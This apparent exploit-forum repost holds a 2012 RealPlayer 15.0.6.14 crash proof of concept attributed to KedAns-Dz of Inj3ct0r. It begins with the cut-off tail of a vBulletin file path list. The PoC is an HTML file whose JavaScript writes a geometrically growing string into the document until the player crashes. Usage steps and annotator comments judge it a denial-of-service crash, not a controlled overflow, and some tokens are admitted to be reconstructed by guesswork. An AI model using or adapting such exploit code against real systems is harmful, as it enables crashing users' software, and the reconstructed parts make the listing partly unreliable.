    /includes/api/6/content.php 
    /includes/api/6/member.php 
    /includes/api/6/newthread_newthread.php 
    /includes/block/blogentries.php 
    /includes/block/cmsarticles.php 
    /includes/block/html.php 
    /includes/block/newposts.php 
    /includes/block/sgdiscussions.php 
    /includes/block/tagcloud.php 
    /includes/block/threads.php 
    /forumrunner/include/subscriptions.php 
    /forumrunner/include/search_forum.php 
    /forumrunner/include/profile.php 
    /forumrunner/include/post.php 
    /forumrunner/include/pms.php 
    /forumrunner/include/online.php 
    /forumrunner/include/moderation.php 
    /forumrunner/include/misc.php 
    /forumrunner/include/login.php 
    /forumrunner/include/get_thread.php 
    /forumrunner/include/get_forum.php 
    /forumrunner/include/cms.php 
    /forumrunner/include/attach.php 
    /forumrunner/include/announcement.php 
    /forumrunner/include/album.php 
    /forumrunner/support/vbulletin_methods.php 
    /forumrunner/support/stringparser_bbcode.class.php 
    /forumrunner/support/utils.php 
    /forumrunner/support/other_methods.php 
    /packages/skimlinks/hooks/postbit_display_complete.php 
    /packages/skimlinks/hooks/showthread_complete.php 
    /packages/skimlinks/hooks/userdata_start.php  
      
    # 1337day.com [2012-12-12]
     
  12. WH!T3 W01F
    RealPlayer .html v15.0.6.14 Memory Corruption & Overflow PoC

    RealPlayer .html v15.0.6.14 Memory Corruption & Overflow PoC — a repost of the 1337day/Inj3ct0r advisory by KedAns-Dz dated 2012-12-12. The listing below is a single HTML file which, when opened in RealPlayer, writes a geometrically growing string into the document until the player crashes. The post gives no CVE, vendor reference or debugger output, so the "memory corruption / overflow" claim rests on the author's crash observation alone.

    HTML (the forum's code box mislabels this listing as PHP; it is an HTML file with inline JavaScript):
    <!-- 
    //...Leaked bY beBoss..//  
    //......12.12.2012.....// 
    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    0     _                   __           __       __                     1 
    1   
    /' \            __  /'__`\        /\ \__  /'__`\                   0 
    0  
    /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
    1  
    \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
    1                  \ \____/ >> Exploit database separated by exploit   0 
    0                   \/___/          type (local, remote, DoS, etc.)    1 
    1                                                                      1 
    0  [+] Site            : 1337day.com                                   0 
    1  [+] Support e-mail  : submit[at]1337day.com                         1 
    0                                                                      0 
    1               #########################################              1 
    0               I'm KedAns-Dz member from Inj3ct0r Team                1 
    1               #########################################              0 
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
      
    ### 
    # Title : RealPlayer .html v15.0.6.14 Memory Corruption and Overflow POC 
    # Author : KedAns-Dz 
    # E-mail : ked-h (@hotmail.com / @1337day.com) 
    # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) 
    # *** Site : www.1337day.com .net .org 
    # FaCeb0ok : http://fb.me/Inj3ct0rK3d 
    # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com 
    # Platform/CatID : local - 0day 
    # Type : Local Exploit - proof of concept 
    # Tested on : Windows7 (Fr) 
    ### 
      
    # <3 <3 Greetings t0 Palestine <3 <3 
    # Greetings To BarbarOS-Dz in the jail x_x ! F-ck HaCking, Lov3 Explo8ting 
      
    Info : 
    Save the HTML code below as p0c.html and open it with RealPlayer (drop it onto the player or use File > Open). 
    Per the author the player renders "ABCABC..." and then crashes ("Boom"). Run it only in a disposable VM: the script grows a string geometrically and writes it into the document on every pass, so the intended outcome is a process crash / memory exhaustion. Nothing in the file gives a controlled write, so treat the "memory corruption" claim as unverified until reproduced under a debugger. 
      
    --> 
      
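    <html> 
    <head> 
    <title>Memory Corruption bY KedAns-Dz</title> 
    <!-- NOTE(review): the published markup opens <body> inside <head> and
         closes </body> after </head>. It is kept as-is: the report only claims
         a crash in RealPlayer's own HTML rendering, and fixing the nesting could
         change which parser path is exercised. The tokens body / language /
         javascript / document had been masked as asterisks by the forum's word
         filter in the post; they are restored below from their length and
         position (4, 8, 10 and 8 characters), not from a second copy of the
         file. -->
    <body onload="javascript:KedAns();"> 
    <script language="javascript"> 
    // Entry point, invoked from <body onload>. It writes two large strings
    // into the document; the author reports that RealPlayer 15.0.6.14 on
    // Windows 7 (Fr) crashes while rendering them. Nothing in this function
    // chooses an address or a write target, so the file on its own shows a
    // crash (DoS-class), not a controlled overflow; "Memory Corruption" in
    // the title is the author's characterisation of that crash.
    function KedAns() 
    {
        // Buffer 1: the post shows sixteen unescape("䅂䅂") calls. The two
        // characters appear to be U+4142 (what unescape("%u4142") yields once
        // the forum rendered the escapes as characters) — confirm against the
        // original file. unescape() leaves a string without % sequences
        // unchanged, so either form gives the same 32 UTF-16 code units of
        // 0x4142: a fill pattern, not an "AB" byte string in memory.
        var puf = "";
        for (var chunk = 0; chunk < 16; ++chunk) {
            puf += unescape("䅂䅂");
        }
        document.write(puf); // Buffer1 

        // Buffer 2: starts as "ABC" and is tripled on every pass
        // (buffer += buffer + buffer), so after k passes it holds 3^(k+1)
        // characters. 1000 passes can never complete — the string exceeds any
        // allocator long before that — so the crash the author observes is an
        // allocation failure somewhere in this write/grow cycle.
        // The braces were stripped by the forum along with the other tokens;
        // the blank lines left at their positions put document.write() inside
        // the loop, which is how it is restored here. `i` was an implicit
        // global in the post; declaring it changes nothing observable.
        var buffer = '\x41\x42\x43'; // ABC buffer 
        for (var i = 0; i <= 999; ++i)
        {
            buffer += buffer + buffer;
            document.write(buffer); // Corrupt this !!! 
        }

        // [ Memory Corruption !! (*__^) ] 
    }  
    </script> 
    </head> 
    </body> 
    </html> 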
    <!-- 
      
    #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=============================================== 
    # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem 
    # Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ, 
    # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) 
    # Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection 
    # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all 
    # Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD 
    # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits ***s 
    #============================================================================================================ -->  
      
    # 1337day.com [2012-12-12]
     